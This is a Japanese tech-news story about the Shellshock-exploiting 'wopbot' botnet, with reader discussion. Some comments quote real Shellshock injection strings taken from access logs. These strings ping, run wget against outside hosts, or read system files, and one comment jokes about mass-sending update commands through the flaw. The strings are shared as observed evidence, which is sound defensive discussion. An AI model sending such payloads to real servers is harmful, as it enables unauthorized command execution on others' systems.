bashのShellshock脆弱性を利用するボットネットが出現 69
ストーリー by headless
出現 部門より
出現 部門より
先日発見されたbashの脆弱性「Shellshock」を利用するボットネットが出現したそうだ(iTnewsの記事、
本家/.)。
イタリアのセキュリティ企業Tiger SecurityのCEO、Emanuele Gentili氏によれば、このボットネットはLinuxサーバー上で動作する「wopbot」というもの。wopbotはインターネット上をスキャンしてShellshock脆弱性のあるシステムを探し出し、感染を広げていく。Gentili氏が入手したマルウェアのサンプルをサンドボックス内で解析したところ、米国防総省のIPアドレス範囲に対する大量のスキャンが行われることが判明したという。また、Akamaiのホストするサーバーに対するDDoS攻撃も行われていたとのこと。その後、Tiger Securityでは英国と米国のISPに連絡し、wopbotのC&Cサーバーとマルウェアをホストするサーバーをネットワークから切り離すことに成功している。
現在のところwopbotの感染台数は不明だが、Shellshock脆弱性による影響はOpenSSLのHeartbleed脆弱性以上のものになる可能性もあるとのことだ。
イタリアのセキュリティ企業Tiger SecurityのCEO、Emanuele Gentili氏によれば、このボットネットはLinuxサーバー上で動作する「wopbot」というもの。wopbotはインターネット上をスキャンしてShellshock脆弱性のあるシステムを探し出し、感染を広げていく。Gentili氏が入手したマルウェアのサンプルをサンドボックス内で解析したところ、米国防総省のIPアドレス範囲に対する大量のスキャンが行われることが判明したという。また、Akamaiのホストするサーバーに対するDDoS攻撃も行われていたとのこと。その後、Tiger Securityでは英国と米国のISPに連絡し、wopbotのC&Cサーバーとマルウェアをホストするサーバーをネットワークから切り離すことに成功している。
現在のところwopbotの感染台数は不明だが、Shellshock脆弱性による影響はOpenSSLのHeartbleed脆弱性以上のものになる可能性もあるとのことだ。
早速shodanが探り入れてきてます? (スコア:3, 参考になる)
198.20.69.74(census1.shodan.io)から、
GET / HTTP/1.1
Cookie: () { :; }; /bin/ping -c 1 104.131.0.69
Referer: () { :; }; /bin/ping -c 1 104.131.0.69
User-agent: () { :; }; /bin/ping -c 1 104.131.0.69
などというのがきてます。
104.131.0.69は hello.data.shodan.io だそうです。
ちなみに
census1.shodan.io 198.20.69.74
census2.shodan.io 198.20.69.98
census3.shodan.io 198.20.70.114
census4.shodan.io 198.20.99.130
census5.shodan.io 93.120.27.62
census6.shodan.io 66.240.236.119
census7.shodan.io 71.6.135.131
census8.shodan.io 66.240.192.138
census9.shodan.io 71.6.167.142
census10.shodan.io 82.221.105.6
census11.shodan.io 82.221.105.7
census12.shodan.io 71.6.165.200
census.shodan.io 208.180.20.97
Re:早速shodanが探り入れてきてます? (スコア:1)
我が家のapacheでgrep '()' access_logしたら昨日の時点でもかなりのアクセスが見つかりました
確認しているだけで
() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://example.com/'
() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://exmaple.com/ [dipad.biz]\"
() { :;};echo Content-type:text/plain;echo;/bin/ls /etc/resolv.conf;exit
() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit
() { :; }; echo Mozilla: `echo K3Vbs0di2P`
などなどいろんなパターンがありますね
Re: (スコア:0)
なるほど。その手の変数名をつかうと、より効果的に攻撃出来るんですね。
Re: (スコア:0)
Apacheのmod_envとか、Appサーバーとの連携で環境変数つかってたりするのも狙われるわけだ。
なるほど、こういう攻撃方法を考えつくわけか…。
Re: (スコア:0)
全ヘッダのログを取るには、mod_log_forensic使わないとだめなのか。 環境変数が何でもよいというのは痛いなぁ。
http://httpd.apache.org/docs/2.4/mod/mod_log_forensic.html [apache.org]
bashを修正するボットネット (スコア:3, おもしろおかしい)
ボットネットを作るなら、脆弱性を使って、bashを 修正 して回るボットネットを作って欲しかったですね
たとえば curl あたりを使って HTTP経由で
'() { :;}; yum update bash'
'() { :;}; apt-get update && apt-get install bash'
みたいな文字列を撒き散らすだけで、 redhat系、 debian系のサーバは大抵修正できる筈です。文字列を少し変えれば、他のOSにも対応できます
脆弱性を抱えたサーバも減るし、それを踏み台にした攻撃も減るので、多くの人が幸せになれるんですけどねぇ。
Re:bashを修正するボットネット (スコア:2)
Re: (スコア:0)
しかしroot権限がなくて実行不可という落ちが見える
Re: (スコア:0)
修正後のシェルを送り込んで、.bashrcから起動すれば…
と思ったけども、system関数から呼び出す時は、.bashrcはスキップされるっぽい?
Re: (スコア:0)
.bashrcは環境変数の評価より先に実行されるの?
Re: (スコア:0)
「不正アクセスされたんですけど、最適化されてなんか調子いいんです〜」
みたななことも起きるかも。
Re:bashを修正するボットネット (スコア:1)
たしか。 nimdaあたりが流行った頃に、そういうのが実在したはず。
==========================================
投稿処理前プレビュー確認後書込処理検証処理前反映可否確認処理後……
NHKでニュースになってた (スコア:2, 興味深い)
bashの脆弱性がニュースになってたけど、bash自体の説明が
> インターネットのホームページを表示するサーバーで広く利用されているプログラム
となってて、うーん間違ってないけどあってもいないような。
もやもやした。
Re:NHKでニュースになってた (スコア:2, すばらしい洞察)
だって一般向けだぜ。
他に何て言えばいいのさって話さ。
毎日こういうのを考えなきゃならん境遇にいるのでAC
この境遇いつまで続くんだろ・・
Re:NHKでニュースになってた (スコア:1)
Re: (スコア:0)
マジレスだけど、そういう仕事が社会ではそういうのが実は一番大事なんだと思う。技術と人との橋渡し。
頑張って下さい。楽しんで下さい。良い仕事して下さい。ほんとに。
まあ、昔、そんな仕事に関わってたので。
Re: (スコア:0)
結構あってるんじゃないの。
インストールベースで考えると、「サーバー用途のマシン」と「bashをインストールしているマシン」にはかなりの強相関があるだろうから。Unix系でもandroidとかはほとんどbash載せてないわけだし、デスクトップLinuxとかIISとか誤差だし。
Re: (スコア:0)
自分のAndroidにはbash入ってるけど、これ標準じゃなかったのか
Re:NHKでニュースになってた (スコア:2)
まあ、busybox bash っていうのもあって。/bin/shを/bin/bashにリンクしてみたり、/bin/bashを/bin/busyboxにしてみたり。
あっちは大丈夫なのかな…?
# カスタマイズが普通のwebサーバはいいけど、ブラックボックスになってるロードバランサとかはなあ
# 複合機のDHCPクライアントの問題とかもう石油ストーブみたいな対処が向いてるんじゃないか
Re: (スコア:0)
>IISとか誤差だし。
シェアNo1のソフトが、誤差だとすると、誤差じゃないWebサーバって何なんだろう。
Re: (スコア:0)
自分にとって都合のいい情報以外は見えない人たちだから…。
Re: (スコア:0)
アクセス数トップ100万未満の泡沫サイトで人気なだけじゃん
Re: (スコア:0)
ウェブをサービスするために利用されてると誤解されるからどうかと思う。
ウェブサーバーじゃなければ問題ないと思われそう。
この際、サーバーの多くに利用されてるプログラム、でいいと思うが、
Re: (スコア:0)
ssh接続でもヤバいんだが
勘違いしてるコメントがちらほらと
Re: (スコア:0)
アカウント持ってなくてもコマンドながせるみたいなのがあればやばいけど。
# 制限なしの方は共有レンタルサーバーとかアップデートされないとやばそうだけどね。
ルーターは影響無いの? (スコア:1)
うちの無線LANルーターは中でlinuxが動いてるそうなんだけど、ついでにbashまで動いてました的なことがないことを祈ってます(ガクブル
考えすぎ?
Re:ルーターは影響無いの? (スコア:1)
組み込みだと、bashよりもbusybox ashが多いんじゃないかな? ルーターファームウェアのOpenWrtとDD-WRTは共にbusybox ashだったはず。
Re: (スコア:0)
うわああ!
busyboxは洒落にならん!
軽いから結構普及してるだろ?
数が多いからパッチなんて当てきれないだろ?
Re: (スコア:0)
ん?今回のbashの脆弱性はbusyboxにも存在するの?
Re: (スコア:0)
busyboxのashはDebianのdashの派生らしいので、今回の脆弱性はありません。
Re:ルーターは影響無いの? (スコア:1)
逆. dashがashの派生.
移植というか派生の流れとしては, おおよそ
SVR4版(ash)→NetBSD版(ash)→Debian版(dash)
という感じ.
ShellShock …このネーミングは (スコア:0)
聞き直してみたら、おまえの心臓が止まるまで不十分だとか歌われてました。
bashなど使っていると心臓が止まるまでゲームをやらされることになるらしい…
http://en.wikipedia.org/wiki/Shellshock_(song) [wikipedia.org]
Re: (スコア:0)
指先一つでダウンさ!(ッターン)
# sync; sync; halt;
ってのを思い浮かべた。
bashのBugではあるんだけど… (スコア:0)
でも標準SHELLをbashにしてる環境が多すぎたり、入力データをまんまSHELLに投げてるプログラムとか
テスト不足のWebServerを代表とするdaemon群が一番悪い気がするんだがなぁ…
Re:bashのBugではあるんだけど… (スコア:2)
今回のバグは、bashが環境変数中に仕込まれたコードを実行してしまう、というものです。そして、リクエスト中のヘッダフィールドを環境変数として渡すことは、CGIの仕様によって要求されています(RFC 3875 [ietf.org])。したがって今回の脆弱性は、Webサーバが仕様通りに動作することがテストされていたとしても、回避することはできません。
攻撃っぽいフィールドを弾いてほしいところかも知れませんが、それは汎用のWebサーバではなくWAFの役割だと思います。
Re: (スコア:0)
bash を #!/bin/sh として起動しても今回の問題が避けられないところまでは確認しましたが、
この環境変数で関数を…って仕様は素の sh にはあるのでしょうか?
(問題があるかどうか以前の問題として)
# 素の sh って定義がアレだとは思いますが…
Re:bashのBugではあるんだけど… (スコア:1)
素のshと言うよりも, 現代のopen source環境ならash(多くの*BSD)/dash(DebianおよびUbuntu)と言っていいんじゃないかな.
OpenBSDやAIX, HP-UXなんかはksh系だけど, こちらはkshと明示することが多いだろうし.
問題はその他の多くのLinuxディストリが/bin/shと言いながら, 実はbashを使っていることだと思う.
Re:bashのBugではあるんだけど… (スコア:1)
Mac OS Xのディフォルトシェルがbashだってことは、あまり広まってない気がしますね。
まぁ、現状Mac OS Xでは、影響少なさげなようですが。
http://complexitydaemon.wordpress.com/2014/09/26/bash-os-x-dhcp-and-you/ [wordpress.com]
Re: (スコア:0)
常識的に考えて標準シェルはcshだよな
Re: (スコア:0)
そうだね、login shell は (t)csh, シェルスクリプトは (POSIX 互換でない、Solaris のやや古臭い) /bin/sh 向けのが最高だね。
※利用者の個人的な感想です。
Re: (スコア:0)
どっから見てもcshとかロクなもんじゃねえ。
Re: (スコア:0)
お前が物事を広く見られない人間だというのは分かった
Re: (スコア:0)
広い(グローバル)視野(スコープ)がないから環境変数使ってますねん(♪デンデン)
CGI使ってなければ問題ないよね? (スコア:0)
CGIとかイマドキそんなに多くないと思うけど、ここまで大騒ぎしてる理由がわかんないなぁ
Re:CGI使ってなければ問題ないよね? (スコア:2, 参考になる)
いいえ。
Unixでは、プログラムが内部的にコマンドを呼び出す際 /bin/sh (OSによってはbashへのシンボリックリンク) を経由させること、環境変数を経由して外部からのデータの受け渡しをすることは非常に多く行われています。そのような処理をしている場合にはCGIプログラムに限らず (もちろん、HTTPに限らず他のサービスでも) 影響を受ける可能性があります。
CGI以外のWebサービス周りで言えば、たとえば、Passenger (Ruby on Rails で利用される) では、ワーカープロセス起動時に /bin/sh を経由するため、今回の影響を受ける可能性があります [phusion.nl]。
HIRATA Yasuyuki
Re: (スコア:0)
日本国政府なめてんの?
Re: (スコア:0)
勘違いしてるコメントってこういうのか
Re: (スコア:0)
自分が使ってるかどうかとサーバで使えるように設定されているかは別だろう。
レンタルサーバなんかでファイルを置くだけで許可を変えられるなら、わざと自分のファイル以外にアクセスするように仕組んだコンテンツをアップロードされる可能性だってある。
本来できないはずのあんなこともこんなこともやり放題だ。
オープンソースは脆弱 (スコア:0)
いやですねぇ
Re:オープンソースは脆弱 (スコア:1)
攻撃する際にはRFC3514に従うことも忘れずに